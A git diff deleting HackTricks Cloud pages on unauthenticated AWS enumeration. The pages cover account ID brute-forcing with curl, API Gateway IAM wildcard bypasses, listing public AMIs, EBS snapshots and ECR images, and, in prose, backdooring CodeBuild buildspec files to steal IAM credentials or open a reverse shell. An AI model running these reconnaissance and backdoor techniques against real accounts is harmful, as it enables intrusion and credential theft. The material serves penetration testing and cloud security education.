[**Cognito Unauthenticated Enum**](aws-cognito-unauthenticated-enum.md) -* [**DocumentDB Unauthenticated Enum**](aws-documentdb-enum.md) -* [**EC2 Unauthenticated Enum**](aws-ec2-unauthenticated-enum.md) -* [**Elasticsearch Unauthenticated Enum**](aws-elasticsearch-unauthenticated-enum.md) -* [**IAM Unauthenticated Enum**](aws-iam-and-sts-unauthenticated-enum.md) -* [**IoT Unauthenticated Access**](aws-iot-unauthenticated-enum.md) -* [**Kinesis Video Unauthenticated Access**](aws-kinesis-video-unauthenticated-enum.md) -* [**Media Unauthenticated Access**](aws-media-unauthenticated-enum.md) -* [**MQ Unauthenticated Access**](aws-mq-unauthenticated-enum.md) -* [**MSK Unauthenticated Access**](aws-msk-unauthenticated-enum.md) -* [**RDS Unauthenticated Access**](aws-rds-unauthenticated-enum.md) -* [**Redshift Unauthenticated Access**](aws-redshift-unauthenticated-enum.md) -* [**SQS Unauthenticated Access**](aws-sqs-unauthenticated-enum.md) -* [**S3 Unauthenticated Access**](aws-s3-unauthenticated-enum.md) - -## Cross Account Attacks - -In the talk [**Breaking the Isolation: Cross-Account AWS Vulnerabilities**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) it's presented how some services allow(ed) any AWS account accessing them because **AWS services without specifying accounts ID** were allowed. - -During the talk they specify several examples, such as S3 buckets **allowing cloudtrai**l (of **any AWS** account) to **write to them**: - -![](<../../../.gitbook/assets/image (260).png>) - -Other services found vulnerable: - -* AWS Config -* Serverless repository - -## Tools - -* [**cloud\_enum**](https://github.com/initstring/cloud_enum): Multi-cloud OSINT tool. **Find public resources** in AWS, Azure, and Google Cloud. Supported AWS services: Open / Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md deleted file mode 100644 index e3a79d5b1..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md +++ /dev/null @@ -1,71 +0,0 @@ -# AWS - Accounts Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Account IDs - -If you have a target there are ways to try to identify account IDs of accounts related to the target. - -### Brute-Force - -You create a list of potential account IDs and aliases and check them - -```bash -# Check if an account ID exists -curl -v https://.signin.aws.amazon.com -## If response is 404 it doesn't, if 200, it exists -## It also works from account aliases -curl -v https://vodafone-uk2.signin.aws.amazon.com -``` - -You can [automate this process with this tool](https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_accounts.py). - -### OSINT - -Look for urls that contains `.signin.aws.amazon.com` with an **alias related to the organization**. - -### Marketplace - -If a vendor has **instances in the marketplace,** you can get the owner id (account id) of the AWS account he used. - -### Snapshots - -* Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots) -* RDS public snapshots (RDS -> Snapshots -> All Public Snapshots) -* Public AMIs (EC2 -> AMIs -> Public images) - -### Errors - -Many AWS error messages (even access denied) will give that information. - -## References - -* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md deleted file mode 100644 index 24abdac6e..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md +++ /dev/null @@ -1,85 +0,0 @@ -# AWS - API Gateway Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### API Invoke bypass - -According to the talk [Attack Vectors for APIs Using AWS API Gateway Lambda Authorizers - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE), Lambda Authorizers can be configured **using IAM syntax** to give permissions to invoke API endpoints. This is taken [**from the docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html): - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Permission", - "Action": [ - "execute-api:Execution-operation" - ], - "Resource": [ - "arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path" - ] - } - ] -} -``` - -The problem with this way to give permissions to invoke endpoints is that the **"\*" implies "anything"** and there is **no more regex syntax supported**. - -Some examples: - -* A rule such as `arn:aws:execute-apis:sa-east-1:accid:api-id/prod/*/dashboard/*` in order to give each user access to `/dashboard/user/{username}` will give them access to other routes such as `/admin/dashboard/createAdmin` for example. - -{% hint style="warning" %} -Note that **"\*" doesn't stop expanding with slashes**, therefore, if you use "\*" in api-id for example, it could also indicate "any stage" or "any method" as long as the final regex is still valid.\ -So `arn:aws:execute-apis:sa-east-1:accid:*/prod/GET/dashboard/*`\ -Can validate a post request to test stage to the path `/prod/GET/dashboard/admin` for example. -{% endhint %} - -You should always have clear what you want to allow to access and then check if other scenarios are possible with the permissions granted. - -For more info, apart of the [**docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html), you can find code to implement authorizers in [**this official aws github**](https://github.com/awslabs/aws-apigateway-lambda-authorizer-blueprints/tree/master/blueprints). - -### IAM Policy Injection - -In the same [**talk** ](https://www.youtube.com/watch?v=bsPKk7WDOnE)it's exposed the fact that if the code is using **user input** to **generate the IAM policies**, wildcards (and others such as "." or specific strings) can be included in there with the goal of **bypassing restrictions**. - -### Public URL template - -``` -https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} -``` - -### Get Account ID from public API Gateway URL - -Just like with S3 buckets, Data Exchange and Lambda URLs gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public API Gateway URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ -This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). - -You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md deleted file mode 100644 index 8f553e9b7..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md +++ /dev/null @@ -1,37 +0,0 @@ -# AWS - Cloudfront Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -https://{random_id}.cloudfront.net -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md deleted file mode 100644 index 9d4227753..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md +++ /dev/null @@ -1,61 +0,0 @@ -# AWS - CodeBuild Unauthenticated Access - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## CodeBuild - -For more info check this page: - -{% content-ref url="../aws-services/aws-codebuild-enum.md" %} -[aws-codebuild-enum.md](../aws-services/aws-codebuild-enum.md) -{% endcontent-ref %} - -### buildspec.yml - -If you compromise write access over a repository containing a file named **`buildspec.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a CodeBuild project and exfiltrate the secrets, compromise what is done and also compromise the **CodeBuild IAM role credentials**. - -Note that even if there isn't any **`buildspec.yml`** file but you know Codebuild is being used (or a different CI/CD) **modifying some legit code** that is going to be executed can also get you a reverse shell for example. - -For some related information you could check the page about how to attack Github Actions (similar to this): - -{% content-ref url="../../../pentesting-ci-cd/github-security/abusing-github-actions/" %} -[abusing-github-actions](../../../pentesting-ci-cd/github-security/abusing-github-actions/) -{% endcontent-ref %} - -## Self-hosted GitHub Actions runners in AWS CodeBuild - -As [**indicated in the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html), It's possible to configure **CodeBuild** to run **self-hosted Github actions** when a workflow is triggered inside a Github repo configured. This can be detected checking the CodeBuild project configuration because the **`Event type`** needs to contain: **`WORKFLOW_JOB_QUEUED`** and in a Github Workflow because it will select a **self-hosted** runner like this: - -```bash -runs-on: codebuild--${{ github.run_id }}-${{ github.run_attempt }} -``` - -This new relationship between Github Actions and AWS creates another way to compromise AWS from Github as the code in Github will be running in a CodeBuild project with an IAM role attached. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md deleted file mode 100644 index 89c2f12cd..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md +++ /dev/null @@ -1,37 +0,0 @@ -# AWS - DocumentDB Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -.cluster-..docdb.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md deleted file mode 100644 index 8067c97b0..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md +++ /dev/null @@ -1,41 +0,0 @@ -# AWS - DynamoDB Unauthenticated Access - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Dynamo DB - -For more information check: - -{% content-ref url="../aws-services/aws-dynamodb-enum.md" %} -[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md) -{% endcontent-ref %} - -Apart from giving access to all AWS or some compromised external AWS account, or have some SQL injections in an application that communicates with DynamoDB I'm don't know more options to access AWS accounts from DynamoDB. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md deleted file mode 100644 index ea692e888..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md +++ /dev/null @@ -1,88 +0,0 @@ -# AWS - EC2 Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EC2 & Related Services - -Check in this page more information about this: - -{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} - -### Public Ports - -It's possible to expose the **any port of the virtual machines to the internet**. Depending on **what is running** in the exposed the port an attacker could abuse it. - -#### SSRF - -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} - -### Public AMIs & EBS Snapshots - -AWS allows to **give access to anyone to download AMIs and Snapshots**. You can list these resources very easily from your own account: - -{% code overflow="wrap" %} -```bash -# Public AMIs -aws ec2 describe-images --executable-users all - -## Search AMI by ownerID -aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `967541184254/`) == `true`]' - -## Search AMI by substr ("shared" in the example) -aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `shared`) == `true`]' - -# Public EBS snapshots (hard-drive copies) -aws ec2 describe-snapshots --restorable-by-user-ids all -aws ec2 describe-snapshots --restorable-by-user-ids all | jq '.Snapshots[] | select(.OwnerId == "099720109477")' -``` -{% endcode %} - -If you find a snapshot that is restorable by anyone, make sure to check [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) for directions on downloading and looting the snapshot. - -#### Public URL template - -```bash -# EC2 -ec2-{ip-seperated}.compute-1.amazonaws.com -# ELB -http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 -https://{user_provided}-{random_id}.{region}.elb.amazonaws.com -``` - -### Enumerate EC2 instances with public IP - -{% code overflow="wrap" %} -```bash -aws ec2 describe-instances --query "Reservations[].Instances[?PublicIpAddress!=null].PublicIpAddress" --output text -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md deleted file mode 100644 index 0e491c74e..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md +++ /dev/null @@ -1,63 +0,0 @@ -# AWS - ECR Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ECR - -For more information check: - -{% content-ref url="../aws-services/aws-ecr-enum.md" %} -[aws-ecr-enum.md](../aws-services/aws-ecr-enum.md) -{% endcontent-ref %} - -### Public registry repositories (images) - -As mentioned in the ECS Enum section, a public registry is **accessible by anyone** uses the format **`public.ecr.aws//`**. If a public repository URL is located by an attacker he could **download the image and search for sensitive information** in the metadata and content of the image. - -{% code overflow="wrap" %} -```bash -aws ecr describe-repositories --query 'repositories[?repositoryUriPublic == `true`].repositoryName' --output text -``` -{% endcode %} - -{% hint style="warning" %} -This could also happen in **private registries** where a registry policy or a repository policy is **granting access for example to `"AWS": "*"`**. Anyone with an AWS account could access that repo. -{% endhint %} - -### Enumerate Private Repo - -The tools [**skopeo**](https://github.com/containers/skopeo) and [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) can be used to list accessible repositories inside a private registry. - -```bash -# Get image names -skopeo list-tags docker:// | grep -oP '(?<=^Name: ).+' -crane ls | sed 's/ .*//' -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md deleted file mode 100644 index 1f9e1b97b..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md +++ /dev/null @@ -1,53 +0,0 @@ -# AWS - ECS Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ECS - -For more information check: - -{% content-ref url="../aws-services/aws-ecs-enum.md" %} -[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md) -{% endcontent-ref %} - -### Publicly Accessible Security Group or Load Balancer for ECS Services - -A misconfigured security group that **allows inbound traffic from the internet (0.0.0.0/0 or ::/0)** to the Amazon ECS services could expose the AWS resources to attacks. - -{% code overflow="wrap" %} -```bash -# Example of detecting misconfigured security group for ECS services -aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contains(IpRanges[].CidrIp, `0.0.0.0/0`) || contains(Ipv6Ranges[].CidrIpv6, `::/0`)]]' - -# Example of detecting a publicly accessible load balancer for ECS services -aws elbv2 describe-load-balancers --query 'LoadBalancers[?Scheme == `internet-facing`]' -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
